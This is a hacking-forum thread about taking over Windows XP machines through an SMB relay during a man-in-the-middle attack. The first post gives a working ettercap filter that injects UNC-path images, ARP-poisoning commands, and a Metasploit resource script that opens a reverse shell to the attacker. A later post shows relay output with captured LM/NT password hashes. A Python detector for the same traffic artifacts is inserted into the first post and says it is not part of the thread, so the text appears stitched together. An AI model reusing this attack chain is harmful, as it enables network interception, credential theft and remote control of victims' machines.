Thread: Own Full patched XP box via HTTP

  1. #1
    Good friend of the forums
    Join Date: Feb 2010
    Posts: 328

    Own Full patched XP box via HTTP

    update 7:27 PM 2/4/2009: http://www.tarasco.org/security/smbrelay/index.html

    videos:

    # with ettercap
    http://s5.video.blip.tv/170000300628...console219.flv

    # Thursday, 20 September 2007 ( not with ettercap )
    http://www.learnsecurityonline.com/v...ay-reverse.swf

    4:42 PM 4/25/2008:
    "I tried it with "Use simple file sharing" (recommended) checked... and the exploit WOULD NOT WORK."

    Sadly (sometimes!?) this is checked by default, so I will look into some other things ...
    You also want to check out the Fast-Track mass client-side, which has the GDI and QT exploits all in one, etc.! (This is part of fast-track.py; you must update it to current.)

    Firefox by design will not load a 'local share', including \\SMB\image.jpg shares
    (if anybody has a non-JavaScript workaround please let me know; Flash also has the same security, or it just gets passed to Firefox and then borks).

    It may be possible to use this trick: 301 redirect the user to a local\share
    http://forums.remote-exploit.org/showthread.php?p=94904

    What you need:
    * ettercap
    * Metasploit framework3
    * victim must have admin privs with a non-blank password and load an HTTP or HTTPS webpage.
    * only works for MITM (LAN, etc.)

    ** based on HD Moore's presentation at Defcon that used WPAD http://video.google.co.uk/videoplay?...56903673801959 'Tactical Exploitation'

    Change the IP to your IP.

    smb.rc
    Code:
    use exploit/windows/smb/smb_relay
    set PAYLOAD windows/shell_reverse_tcp
    set LHOST 192.168.1.90
    set LPORT 21
    exploit

    smb.filter
    Code:
    # strip Accept-Encoding so the server replies with uncompressed HTML
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
          # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    # insert the UNC-path image before </body> in the server's reply
    if (ip.proto == TCP && tcp.src == 80) {
       replace("</body>", "<img src=\"\\\\192.168.1.90\\image.jpg\"> </body>");
       replace("</Body>", "<img src=\"\\\\192.168.1.90\\image.jpg\"> </body>");
       msg("Filter Ran.\n");
    }

    # etterfilter compiles smb.filter into smb.ef for use with ettercap
    etterfilter smb.filter -o smb.ef
    # run ettercap on the target
    ettercap -T -q -F smb.ef -M ARP // // -P autoadd

    # start up msfconsole with the RC script
    /pentest/exploits/framework3/msfconsole -r smb.rc


    What happens?

    ettercap replaces the IMG with \\yourip, so the victim tries to reach your SMB relay server for the IMG;
    then the attacker says NO, access denied! The victim says OK, let me try my login by default.

    "Great job, but I got the well-known error message, which starts so:
    "FAILED! The remote host has only provided us with Guest privileges....""

    Read the error before that error; the Guest error just means the auth failed.

    Quote Originally Posted by www
    5. On a Windows XP Pro computer, make sure that remote logons are not being coerced to the GUEST account (aka "ForceGuest", which is enabled by default on computers that are not attached to a domain). To do this, open the Local Security Policy editor (e.g. by typing 'secpol.msc' into the Run box, without quotes). Expand the "Local Policies" node and select "Security Options". Now scroll down to the setting titled "Network access: Sharing and security model for local accounts". If this is set to "Guest only", change it to "Classic" and restart your computer.
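
    As an added defensive example (not code from this thread or from ettercap/Metasploit), here is a Python detector that inspects HTTP request headers and response bodies for the two artifacts the filter above leaves on the wire: an Accept-Encoding header overwritten with a same-length junk name, and an <img> whose src is a UNC path (\\host\share, or the file:////host form Firefox emits). The sample traffic, the KNOWN_FILE_SERVERS allowlist and the STANDARD_HEADERS set are constructed assumptions.

```python
import re
from typing import Dict, List

# Constructed sample traffic (not captured from the thread's lab): a client
# request whose Accept-Encoding header was overwritten in transit, and a
# server response with a UNC-path <img> appended just before </body>.
SAMPLE_REQUEST = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: www.example.test\r\n"
    "Accept-Rubbish!: gzip, deflate\r\n\r\n"
)
SAMPLE_RESPONSE_BODY = (
    "<html><body><h1>Welcome</h1>"
    '<img src="\\\\192.0.2.10\\image.jpg"> </body></html>'
)
# Hosts the organisation legitimately references as UNC paths (assumption).
KNOWN_FILE_SERVERS = {"fileserver01"}
# Header names a browser normally sends (assumption). An unknown name in a
# request that also lacks Accept-Encoding matches the same-length in-line
# replacement a MITM filter uses to force uncompressed, editable HTML.
STANDARD_HEADERS = {"host", "user-agent", "accept", "accept-language",
                    "accept-encoding", "connection", "referer", "cookie"}

IMG_SRC = re.compile(r'<img[^>]*?\ssrc=["\']?([^"\'>\s]+)', re.IGNORECASE)
# \\host\share\file (IE form) or file:////host/share/file (Firefox-style UNC);
# file:///C:/... has no host component and is deliberately not matched.
UNC_HOST = re.compile(r'^\\\\([^\\/]+)[\\/]|file:(?://|////)([^/]+)/',
                      re.IGNORECASE)

def find_unc_image_refs(html: str) -> List[Dict[str, object]]:
    """Return every <img> whose src would make the browser open an SMB share."""
    hits = []
    for src in IMG_SRC.findall(html):
        m = UNC_HOST.search(src)
        if m:
            host = m.group(1) or m.group(2)
            hits.append({"src": src, "host": host,
                         "known": host.lower() in KNOWN_FILE_SERVERS})
    return hits

def check_request_headers(raw_request: str) -> List[str]:
    """Return unknown header names when Accept-Encoding is missing, else []."""
    names = [line.split(":", 1)[0].strip().lower()
             for line in raw_request.split("\r\n")[1:] if ":" in line]
    if "accept-encoding" in names:
        return []
    return [n for n in names if n not in STANDARD_HEADERS]
```

Run it over proxy or IDS-captured traffic; a hit on an unknown host is the injected image, and a request with a mangled header name is the compression-stripping half of the same tampering.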

  2. #2
    Junior Member unix_r00ter
    Join Date: Feb 2007
    Posts: 64

    does this only work on LAN??

  3. #3
    Member imported_Deathray
    Join Date: Oct 2007
    Posts: 381

    Very interesting! I'm going to try it out right away.
    I'll be back and tell how it went.

    Quote Originally Posted by unix_r00ter
    does this only work on LAN??
    Read up on MITM (man in the middle) attacks.

  4. #4
    Just burned his ISO
    Join Date: Apr 2008
    Posts: 2

    Quote Originally Posted by unix_r00ter
    does this only work on LAN??
    It may be possible to inject the image with airpwn?

  5. #5
    Member imported_Deathray
    Join Date: Oct 2007
    Posts: 381

    Target: Windows XP SP0 no updates at all.
    Ettercap
    Code:
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Filter Ran.
    Msfconsole
    Code:
    msf exploit(smb_relay) >
    [*] Received 192.168.1.78:1057 \ LMHASH:00 NTHASH: OS:Windows 2002 2600 LM:Windows 2002 5.1
    [*] Sending Access Denied to 192.168.1.78:1057 \
    [*] Received 192.168.1.78:1057 VICTIMLOSER\Victimlooser 
    LMHASH:93d1db444663b9c09378060fe4c2aead62db490241055c20 
    NTHASH:c3156deb18c7a6e6d800c39c451abcfe39baaa133d72058a OS:Windows 2002 2600 LM:Windows 2002 5.1
    [*] Authenticating to 192.168.1.78 as VICTIMLOSER\Victimlooser...
    [*] Failed to authenticate as VICTIMLOSER\Victimlooser...
    And by the way, I think you should lookup the rules about links in signatures.
    I'm not sure if plain-text links are allowed. Just trying to keep you out of trouble

  6. #6
    Good friend of the forums williamc
    Join Date: Feb 2010
    Location: Chico CA
    Posts: 285

    Couple of questions:
    Must file sharing be enabled on the victim as mentioned in the presentation?

    Is this for IE only? I'm seeing IE using <img src="\\ip\share\i.jpg> while Firefox is mozicon-url:file:////ip/share/i.jpg

  7. #7
    Good friend of the forums
    Join Date: Feb 2010
    Posts: 328

    Hmm, I'll try it with FF and add the code if it works. Thanks!

  8. #8
    Very good friend of the forum drgr33n
    Join Date: Jan 2010
    Location: Dark side of the moon ...
    Posts: 699

    Nice little audit. I wrote a tut similar to this last October; check it out.

    http://forum.remote-exploit.org/show...?t=9121&page=2

  9. #9
    Good friend of the forums williamc
    Join Date: Feb 2010
    Location: Chico CA
    Posts: 285

    Can you clarify how this will affect a corporate network? Will all clients be routed through my client by default or can you limit it to those that type in your IP address in the web browser?

  10. #10
    Good friend of the forums
    Join Date: Feb 2010
    Posts: 328

    Quote Originally Posted by Dr_GrEeN
    Nice little audit, I wrote a tut similar to this last October check it out.

    http://forum.remote-exploit.org/show...?t=9121&page=2
    Yeah, nowadays I would use a more current sploit, say RTSP, etc.
    http://rmccurdy.com/scripts/videos/q...3%20msfweb.swf
